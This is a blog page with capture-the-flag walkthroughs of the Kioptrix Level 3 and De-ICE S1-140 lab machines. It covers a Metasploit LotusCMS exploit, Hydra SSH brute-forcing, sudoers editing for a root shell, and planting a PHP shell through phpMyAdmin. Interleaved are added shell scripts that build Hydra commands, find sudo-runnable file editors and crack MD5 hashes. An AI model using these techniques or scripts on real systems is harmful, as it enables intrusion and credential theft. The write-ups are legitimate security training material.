Sups h4x0rsss.... :)
Sorry that I intentionally skipped posting my 'walkthrough' on Kioptrix Level 2. In fact, I have already pwned the box, but the screenshots taken during the process are stored on another machine... :((
Things have been getting complicated lately as I lost my precious internet connection for several days, which gave me a bad time updating my blog posts. However, worry not, the internet is coming back soon enough... :))
And I will be sure to post my Kioptrix Level 2 walkthrough as soon as possible...
Delay no more, here I present to you Level 3 of the Kioptrix series... which I think is a pretty easy challenge to complete. However, I am sure there are other ways to penetrate it... I just happened to go through the easy one huh...
OK! Let's start by finding the IP address of the target box, since it is using DHCP...
Here it is, the IP address of our target box is 192.168.17.142... (It's pretty easy to pick out the target IP, as it is the only unfamiliar IP wandering around the lab network... :p)
Next step is the reconnaissance process... as usual, here comes the big help of Nmap...
The results tell us that there are only 2 services running on the box: SSH and HTTP...
Let's bring it to the aggressive scan mode (service and version detection) and see if we are able to harvest some more information about the target box...
Not fruitful enough...
Not to be disappointed, the reconnaissance process is not over yet... :p
Let's take a look at their website...
Ahaaa... we found a login page for the website... tried some easy combinations: "admin::admin", "admin::password", "admin::letmein"...
Of course they wouldn't leave such a stupid, careless mistake here... Tried SQL injection next, assuming the input is not sanitised and they are running a MySQL database...
Again another rejection by the box... :(
Looking carefully, we notice that the site is "Proudly powered by LotusCMS"! Some Google-fu tells me that LotusCMS 3.0 is vulnerable to remote PHP code execution (user input ends up in an eval())...
So here we bring up msfconsole and search for the lotuscms vulnerability... :))
Simple and straightforward enough: there is only 1 module to choose from for our attack on the target box (exploit/multi/http/lcms_php_exec)...
Setting the options required by the exploit (the target host and the URI where the CMS lives) and picking a payload... and we're ready to GO!
After some MAGIK done by Metasploit, we've got a shell on the target box... :))
Tried running some local privilege escalation exploits, but none of them worked... :(
After banging around the walls, we are still stuck at "www-data" privileges, which is not our ultimate goal... :(
So after poking around the files inside the box, we collected some usernames from /etc/passwd for password brute-forcing... (You leave me no choice!)
Launching Hydra against the SSH service on our target box...
After some time, a password surfaced for the username "loneferret"...
Next step is to SSH into the target box using the credentials found earlier...
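The passwd-to-Hydra step above, as an added example (my own shell script, not from the original post): the /etc/passwd content below is constructed, with only the loneferret account taken from the box; the jdoe account, the service accounts, the target IP and the wordlist path are placeholders. The script filters out the accounts worth brute-forcing and prints the Hydra command rather than running it, since that needs the live box.

```shell
#!/bin/sh
# Added example, not from the original post: turn an /etc/passwd listing into a
# short user list for Hydra. PASSWD_SAMPLE is constructed for this example; only
# "loneferret" is a real account from the box, "jdoe" and the rest are made up.
PASSWD_SAMPLE='root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
mysql:x:105:110:MySQL Server,,,:/var/lib/mysql:/bin/false
loneferret:x:1000:100::/home/loneferret:/bin/bash
jdoe:x:1001:100::/home/jdoe:/bin/rbash'

# Print login names worth brute-forcing: UID 0 or UID >= 1000 (the first human
# UID on Debian/Ubuntu; adjust for other distros) whose shell is a real shell
# rather than nologin/false/sync and friends. Service accounts only waste tries.
candidate_users() {
    printf '%s\n' "$1" | awk -F: '
        ($3 == 0 || $3 >= 1000) &&
        $7 !~ /(nologin|false|sync|halt|shutdown)$/ { print $1 }'
}

# Build the Hydra command line. Not executed here because it needs a live
# target; -L/-P take the user and password files, -t 4 keeps the parallel
# connections low enough not to trip sshd's MaxStartups, -f stops at the first
# valid pair, -o saves the result.
hydra_cmd() {
    target=$1
    users_file=$2
    wordlist=$3
    printf 'hydra -L %s -P %s -t 4 -f -o hydra.out ssh://%s\n' \
        "$users_file" "$wordlist" "$target"
}

# Usage: write the filtered users to a file, then show the command to run.
candidate_users "$PASSWD_SAMPLE"
hydra_cmd 192.168.17.142 users.txt /usr/share/wordlists/rockyou.txt
```

In practice you redirect `candidate_users` into `users.txt` and then paste the printed Hydra line; with three users instead of the whole passwd file, the brute-force against SSH finishes in a fraction of the time.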
However, the user "loneferret" does not have sudo privileges for a shell... :(
However, we notice that the user "loneferret" is allowed to execute the ht editor (a hex/text editor) with sudo...
After executing the ht editor with sudo privileges...
We can edit the sudoers list in /etc/sudoers using ht, since the editor is now running as root...
Pressing "F3" pops up the "Open" window... navigate to /etc/sudoers directly by typing the path into the address bar at the top...
Then, we add /bin/bash as a permitted sudo command for the user "loneferret"... and press "F2" to save...
Quit the ht editor and check the available sudo commands for the user "loneferret" again (sudo -l)...
And, shoot in the MAGIK words "sudo /bin/bash" and we are given a root shell on the target box... :))
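The sudo part of the chain above, as an added example (my own script, not from the original post): it parses `sudo -l` output and flags any allowed command that can open and save arbitrary files as root, which is exactly what turned "sudo ht" into a root shell here. The `sudo -l` text is constructed to mirror the box; the /usr/local/bin/ht path and the !/usr/bin/su entry are assumptions about how the file looked.

```shell
#!/bin/sh
# Added example, not from the original post. SUDO_L_SAMPLE is constructed to
# look like `sudo -l` for loneferret; the ht path and the denied su entry are
# assumptions, not copied from the box.
SUDO_L_SAMPLE='User loneferret may run the following commands on this host:
    (root) NOPASSWD: !/usr/bin/su
    (root) NOPASSWD: /usr/local/bin/ht'

# Programs that, run as root, can open and write any file on disk. ht is a hex
# editor rather than a text editor, but for /etc/sudoers that makes no difference.
FILE_WRITERS='ht vi vim nano emacs less more ed'

# Print the allowed command paths from `sudo -l` output: drop the header line,
# strip the "(runas) NOPASSWD:" prefix, split comma lists, skip "!" denials.
allowed_commands() {
    printf '%s\n' "$1" | sed -n 's/^ *(.*) *\(NOPASSWD: *\)\{0,1\}//p' |
        tr ',' '\n' | sed 's/^ *//; s/ *$//' | grep -v '^!' | grep -v '^$'
}

# Of the allowed commands, print those whose basename is a known file writer.
sudo_file_writers() {
    allowed_commands "$1" | while read -r cmd; do
        base=${cmd##*/}
        for w in $FILE_WRITERS; do
            if [ "$base" = "$w" ]; then
                printf '%s\n' "$cmd"
            fi
        done
    done
}

# The sudoers line to type into the root editor so the user gets a shell.
sudoers_shell_line() {
    printf '%s ALL=(ALL) NOPASSWD: /bin/bash\n' "$1"
}

# Usage: list the exploitable entries, then show the line to add.
sudo_file_writers "$SUDO_L_SAMPLE"
sudoers_shell_line loneferret
```

One caveat when editing /etc/sudoers by hand instead of through visudo: a syntax error makes every sudo invocation fail, so once the root shell is up, run `visudo -cf /etc/sudoers` from it to confirm the file still parses before you log out.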
Tuesday, May 27, 2014
[WALKTHROUGH] KIOPTRIX Level 3
Labels: CVE-2002-0082, dhcp, ht editor, http, hydra, injection, kali linux, kioptrix, level3, lotuscms, metasploit, msfconsole, mysql, nmap, privilege escalation, reconnaissance, ssh, vulnhub
Thursday, May 15, 2014
[WALKTHROUGH] De-ICE_S1-140
Seems like this will be the final challenge in the De-ICE series... and I really enjoyed myself throughout the full series...
Hopefully we will see some new challenges added to this series again.. :)
For the moment, let's head on and attack the final box...
This box is running with DHCP enabled... hence a ping sweep across the network is required to find out the real IP address of the target box...
Here, we use Netdiscover to find the IP address of the target box, which is 192.168.17.141
Never forget to recon the box and grab as much info as possible...
Aggressive mode...
Checking out their website... some quotes by Bill Gates <3
Seems like there is nothing we can get from the website (there is a hints section on the website)...
Let's try DirBuster and see if we might get some interesting sub-directories....
Some interesting sub-directories found: forum, phpmyadmin, webmail...
Let's head over to the forum section and see what we might get from there...
Oops... a careless mistake by one of the staff, "mbrown", who leaked his own password in the forum... ;)
Let's try logging in to the forum using the 'mbrown' account credentials...
And we can see his email address after logging in to his profile...
Since we got an email address, we might as well try logging in to his webmail and see if it works...
BOOM! Another password found, this time for the "root" account... XD
From this email, we find out that "mbrown" uses the same password for several services... (as we can see even at this stage... 'mbrown' is using the same password for his forum and email accounts...)
Since we now have the 'root' account for phpMyAdmin, let's check out phpMyAdmin as well...

We are able to log in successfully using the "root" account found... and we can see some password hashes in the database as well... :)
By searching the hashes with Google, we can easily find the passwords for two of the accounts there...
Now, we try to FTP into the box using the credentials we just found...
Fortunately, we are able to access the FTP service successfully using the 'rhedley' account...
Sniffing around for suspicious files, we see an encrypted file in the FTP folder... Sadly, we do not have the key to decrypt the file at the moment, but we download it to our local box for later use...
Seems like we are running out of ways to get a shell on the box... :(
After Googling around, we found that /forum/templates_c/ is actually writable... that sheds some light here...
Quickly logging in to phpMyAdmin, we create a new table 'shell' under the 'test' database..
Generate a PHP shell payload...
Insert the code into column '1' of table 'shell'...
Then SELECT it INTO DUMPFILE, writing the row out as a file under /forum/templates_c/ (DUMPFILE, unlike OUTFILE, writes the raw value without quoting or a trailing newline, which is what we want for a PHP file)...
Refresh the page at /forum/templates_c/ and we can see a newly created phpshell.php file... :)
Before running the shell payload, we need to prepare a handler in order to catch the connection back...
We now have a shell on the target box, but the shell is running with minimal privileges...
Let's try the 'rhedley' account we found earlier...
Another round of scouring around...
And we find the key to decrypt the encrypted file we retrieved earlier... :)
After decrypting the file, we find that it is actually a copy of the 'etc' folder of the target box... now we need to crack the passwords in order to get sudo privileges on the box...
Using the darkc0de wordlist, we are able to get the password for the 'sraines' account, which is the previous account of 'swillard'...
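Both hash-cracking steps above (Googling the phpMyAdmin hashes, and the wordlist run against the decrypted etc copy) boil down to the same thing, so here is one added example of my own, not from the original post: an offline wordlist attack against unsalted MD5, the kind of hash older forum software stored. The user names, the wordlist and the third hash are constructed; the first two hashes are md5("password") and md5("123456"), standing in for whatever was actually in the database.

```shell
#!/bin/sh
# Added example, not from the original post. HASHES_FOUND imitates a user:hash
# dump from phpMyAdmin; the user names are constructed, the first two hashes are
# md5 of "password" and "123456", the third matches nothing. WORDLIST is a tiny
# constructed stand-in for darkc0de.
HASHES_FOUND='forum_user1:5f4dcc3b5aa765d61d8327deb882cf99
forum_user2:e10adc3949ba59abbe56e057f20f883e
forum_user3:ffffffffffffffffffffffffffffffff'

WORDLIST='letmein
qwerty
123456
password
dragon'

# Hex MD5 of a string, without a trailing newline in the input (the usual
# mistake when people pipe echo into md5sum). Falls back to openssl if needed.
md5_hex() {
    if command -v md5sum >/dev/null 2>&1; then
        printf '%s' "$1" | md5sum | cut -d' ' -f1
    else
        printf '%s' "$1" | openssl dgst -md5 | sed 's/.* //'
    fi
}

# Try every word against one hash; print the plaintext if found, nothing if not.
crack_md5() {
    target=$(printf '%s' "$1" | tr 'A-F' 'a-f')
    printf '%s\n' "$2" | while read -r word; do
        if [ "$(md5_hex "$word")" = "$target" ]; then
            printf '%s\n' "$word"
            break
        fi
    done
}

# Run a whole user:hash dump through the wordlist, one line of output per user.
crack_dump() {
    printf '%s\n' "$1" | while IFS=: read -r user hash; do
        pw=$(crack_md5 "$hash" "$2")
        printf '%s:%s\n' "$user" "${pw:-<uncracked>}"
    done
}

# Usage
crack_dump "$HASHES_FOUND" "$WORDLIST"
```

This loop is only good for unsalted hashes such as raw MD5 (or for checking a handful of Google hits). The shadow entries inside the decrypted etc copy are salted crypt(3) hashes, so for that step feed the same wordlist to john or hashcat instead of reinventing their work in sh.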
So, let's try switching user to swillard, but using the password found for 'sraines'... "brillantissimo"!
Now we have a proper root shell on the target box... checking out the flag secret.jpg and we are rewarded with a cake! :)
A very rewarding challenge... :)